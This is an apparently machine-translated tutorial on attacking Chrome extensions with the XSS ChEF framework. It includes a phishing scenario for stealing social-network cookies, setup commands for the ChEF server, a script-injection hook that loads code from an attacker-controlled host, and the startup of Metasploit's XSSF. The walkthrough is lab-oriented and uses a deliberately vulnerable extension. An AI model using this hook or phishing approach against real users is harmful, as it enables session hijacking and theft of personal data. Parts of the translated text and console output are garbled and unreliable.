Chrome Extension Exploitation: XSS ChEF

About Chrome

The Chrome development team only focuses on three things: stability, speed, and security. Users who have used Chrome have a deep understanding of its stability and speed, but what about its security? It is difficult to determine whether a software is secure. Fortunately, if there is a Pwn2Own hacker competition, any vulnerabilities in the software will be exposed in this high-quality competition.
After reading the Pwn2Own competition held last year, I have a certain understanding of Chrome's security, which gives me a deeper understanding of Chrome's security.

We all know that XSS vulnerabilities have two basic forms: saved XSS and reflected XSS. Saved XSS can persist cross-site scripts, if no encoding is performed when processing user input and dynamic output content is not encoded during page rendering, all users accessing this page will be tempted. The reflected XSS uses a specially crafted url. The request parameters of a url contain cross-site scripts, and the content of the request parameters is directly displayed if the page is not filtered. Therefore, users will be attacked by XSS.
XSS Filter is mainly used for reflected XSS attacks. Some people may ask about the reflected XSS. How can someone access such an unknown link? Imagine that an SNS website that prefers spam has an XSS vulnerability and you set the website to automatically log on. I want to steal your ID, and I know who you recently fell in love! And she is your friend on this SNS! With this information, it is easy to steal your account. First, I will carefully construct a link with cross-site scripting parameters, and then forge a reminder email from this SNS, who commented on your photo and said you are handsome! The comment link points to this malicious uri, and the modified from header is sent from this SNS website, so you receive this email, even if you have a strong security awareness, but are you sure you can calmly check the URL and then click it? If you click it, I will get your login Cookie or capture some personal privacy content of your SNS! In addition, if I want to steal the numbers of many people, I can replace those who are in the family with those who participate in the XXX activity organized by XXX network and send them to XXX for free, send an email to a zombie group! I believe there are still many people who like free XXX! Therefore, when I was an elementary school student, do not join me in busy areas! Mostly insecure! This principle seems to be suitable for the Internet too!

Chrome introduces XSS Filter to protect users that cannot be relaxed under various temptations, the basic principle of XSS Filter is to compare the request parameters when executing each javascript script. If the javascript script to be executed also exists in the request parameters, the execution of this script will be suspended. This looks good. Of course, there are also many ways to bypass this filter. Some methods have been published by Daniel on the Internet, some of which have been officially fixed, and some have not been fixed yet, there may be a lot of 0-day announcements.

Krzysztof Kotowicz (https://github.com/koto/xsschef) writes a tool, Chrome Terminator: XSS ChEF
Here for more of his functions: http://www.toolswatch.org/2012/08/xss-chef-v1-0-chrome-extension-exploitation-framework/

Obtain source code

root@Dis9Team:~# cd /var/www/root@Dis9Team:/var/www# git clone https://github.com/koto/xsschef.gitCloning into xsschef...remote: Counting objects: 540, done.remote: Compressing objects: 100% (297/297), done.remote: Total 540 (delta 333), reused 446 (delta 239)Receiving objects: 100% (540/540), 310.97 KiB | 102 KiB/s, done.Resolving deltas: 100% (333/333), done.root@Dis9Team:/var/www/xsschef# lsbootstrap     hook.php       README.md   server-xhr.php    toolsconsole.html  LICENCE        server.js   snippets          vulnerable_chrome_extensionfavicon.ico   php-websocket  server.php  snippets.xml.php  xsschef.jsroot@Dis9Team:/var/www/xsschef#

Node. js

It provides two startup Methods: Node. js and PHP, for Node. js is a set of JavaScript toolkit used to compile high-performance network servers. It is easy to understand.

root@Dis9Team:/var/www/xsschef# sudo apt-get install libssl-devroot@Dis9Team:/var/www/xsschef# cd /tmproot@Dis9Team:/tmp# wget http://nodejs.org/dist/v0.8.7/node-v0.8.7-linux-x86.tar.gzroot@Dis9Team:/tmp# tar xf node-v0.8.7-linux-x86.tar.gz.0 root@Dis9Team:/tmp# cd node-v0.8.7-linux-x86root@Dis9Team:/tmp/node-v0.8.7-linux-x86# mkdir /usr/local/noderoot@Dis9Team:/tmp/node-v0.8.7-linux-x86# cp -rf * /usr/local/node/root@Dis9Team:/tmp/node-v0.8.7-linux-x86# ln -s /usr/local/node/bin/n* /usr/bin/

Installed Components

root@Dis9Team:/tmp/node-v0.8.7-linux-x86/node_modules# cd /usr/local/node/root@Dis9Team:/usr/local/node# npm install websocketroot@Dis9Team:/usr/local/node# npm install node-static

Start the server

root@Dis9Team:/var/www/xsschef# node server.js XSS ChEF serverby Krzysztof Kotowicz - kkotowicz at gmail dot comUsage: node server.js [port=8080]Communication is logged to stderr, use node server.js [port] 2>log.txtWed Aug 22 2012 03:20:10 GMT-0700 (PDT) ChEF server is listening on  port 8080Wed Aug 22 2012 03:20:10 GMT-0700 (PDT) Console URL: http://127.0.0.1:8080/Wed Aug 22 2012 03:20:10 GMT-0700 (PDT) Hook URL:    http://127.0.0.1:8080/hook

Hook: http: /127.0.0.1: 8080/hook
UI: http: /127.0.0.1: 8080/

Click get hook code in interface mode.
Eg:

if(location.protocol.indexOf('chrome')==0){d=document;e=createElement('script');e.src='__HOOK_URL__';d.body.appendChild(e);}

And:

Replace _ HOOK_URL _ with your HOOK address: http: // 127.0.0.1: 8080/hook. php with an Internet IP address. Mine is:

Test attack

He provides a CHROME plug-in, vulnerable_chrome_extension, In the XSSCHEF and Directory

 

Chrome install this plug-in

Run the plug-in to insert xss hook code

Select session

We can perform some evil operations on him.

It provides a lot of eval code by default.

Trivial JS

With BEEF and XSSFXSSF

Start XSSF

msf > xssf_urls [+] XSSF Server  : 'http://10.0.3.15:8888/' or 'http://:8888/'[+] Generic XSS injection: 'http://10.0.3.15:8888/loop' or 'http://:8888/loop'[+] XSSF test page : 'http://10.0.3.15:8888/test.html' or 'http://:8888/test.html'[+] XSSF Tunnel Proxy: 'localhost:8889'[+] XSSF logs page: 'http://localhost:8889/gui.html?guipage=main'[+] XSSF statistics page: 'http://localhost:8889/gui.html?guipage=stats'[+] XSSF help page: 'http://localhost:8889/gui.html?guipage=help'msf >

Hook: http: /// 5.5.5.4: 8888/loop
Insert:

BEEF

Start BEEF...